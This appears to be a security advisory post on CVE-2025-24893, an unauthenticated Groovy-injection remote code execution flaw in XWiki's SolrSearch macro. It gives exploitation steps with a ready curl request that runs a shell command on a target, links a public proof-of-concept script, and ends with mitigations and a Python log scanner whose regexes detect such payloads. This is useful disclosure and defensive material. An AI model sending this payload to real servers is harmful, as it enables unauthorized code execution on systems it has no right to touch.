
Jun 5, 2025
CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
An RCE vulnerability in XWiki allows attackers to execute arbitrary Groovy code remotely without any authentication or prior access.
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in XWiki, a popular open-source enterprise wiki platform. The flaw resides in how the SolrSearch macro improperly handles Groovy expressions inside search queries. This allows unauthenticated attackers to execute arbitrary Groovy code remotely—without any authentication or prior access.
- CVE ID: CVE-2025-24893
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 92.01% (Very high likelihood of exploitation)
- Published: February 20, 2025
- Affected Versions: All versions prior to 15.10.11, 16.4.1, and 16.5.0RC1
- Patched Versions: 15.10.11, 16.4.1, 16.5.0RC1
XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine. The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
Attackers can inject Groovy expressions into the search query via a GET request and cause the system to evaluate arbitrary code within the context of the XWiki server process.
Example vulnerable endpoint:
GET /xwiki/bin/view/Main/SolrSearchMacros?search=... (with embedded Groovy code)
This results in direct RCE if the Groovy expression includes system-level commands, such as creating a file or launching a process.
- No authentication required (guest access suffices)
- Publicly exposed XWiki instance
- Affected version in use
- SolrSearch macro available
The root cause is unsafe evaluation of Groovy content inside the SolrSearch macro:
def query = "search=${params.search}" // No sanitization
def result = evaluate(query) // Dangerous use of evaluate()
1. Craft Groovy Code Injection
Construct a payload that embeds system commands into the search parameter.
2. Send GET Request to Macro
curl "http://<target>/xwiki/bin/view/Main/SolrSearchMacros?search=groovy:java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')"
3. Achieve RCE
The injected code is executed, and the attacker gains system-level access on the XWiki server.
As of now, there’s no official Metasploit module for this CVE, but a working PoC exists on GitHub:
📎 https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py
- Upgrade Immediately:
- 15.x users: Upgrade to 15.10.11
- 16.4.x users: Upgrade to 16.4.1
- Others: Use 16.5.0RC1 or newer
- Restrict Guest Access: Disable anonymous guest access to the application wherever possible.
- Use a Web Application Firewall (WAF): Implement filtering to block malicious query parameters.
- Monitor Logs: Look for unusual Groovy expressions in the SolrSearch endpoint access logs.
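A log check for the "Monitor Logs" item above, added here as an example written for this post rather than code from OffSec or the XWiki project: it parses Combined Log Format lines, decodes the `search` parameter of requests to the SolrSearchMacros endpoint, and flags Groovy evaluation markers such as the `groovy:` prefix and `Runtime.getRuntime().exec` seen in the request above. The sample log lines and the marker names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SOLR_PATH = "/xwiki/bin/view/Main/SolrSearchMacros"

# Constructed sample access-log lines (Combined Log Format): the first carries the
# payload shown in the advisory, the other two are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2025:10:14:02 +0000] "GET /xwiki/bin/view/Main/SolrSearchMacros?search=groovy%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch+%2Ftmp%2Fpwned%27%29 HTTP/1.1" 200 5120 "-" "curl/8.5.0"
198.51.100.23 - - [05/Jun/2025:10:15:11 +0000] "GET /xwiki/bin/view/Main/SolrSearchMacros?search=quarterly+report HTTP/1.1" 200 8210 "-" "Mozilla/5.0"
198.51.100.23 - - [05/Jun/2025:10:16:40 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

# Markers of Groovy evaluation in the decoded search value (the names are our own labels).
GROOVY_MARKERS = {
    "groovy_prefix": re.compile(r"^\s*groovy:", re.I),      # groovy: prefix from the advisory
    "groovy_macro": re.compile(r"\{\{\s*groovy", re.I),     # {{groovy}} wiki macro syntax
    "runtime_exec": re.compile(r"Runtime\.getRuntime\s*\(|ProcessBuilder", re.I),
    "exec_call": re.compile(r"\.exec(ute)?\s*\(", re.I),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def search_param(target):
    """Decoded `search` value for requests to the SolrSearch endpoint, else None."""
    parts = urlsplit(target)
    if parts.path != SOLR_PATH:
        return None
    values = parse_qs(parts.query).get("search")
    # parse_qs percent-decodes once; a second unquote catches double-encoded payloads
    return unquote(values[0]) if values else None

def groovy_hits(value):
    """Marker names matching the decoded search value."""
    return [name for name, rx in GROOVY_MARKERS.items() if rx.search(value)]

def scan_log(text):
    """Return (ip, timestamp, status, decoded search value, markers) per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        value = search_param(m["target"]) if m else None
        hits = groovy_hits(value) if value is not None else []
        if hits:
            alerts.append((m["ip"], m["ts"], int(m["status"]), value, hits))
    return alerts
```

Run it over the web server's access log instead of SAMPLE_LOG; a 200 response on a flagged request is the case to investigate first, since the macro executes the expression before rendering.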
- GitHub Advisory GHSA-rr6p-3pfg-562j
- NVD Entry – CVE-2025-24893
- Ionix Blog Analysis
- PoC Exploit Script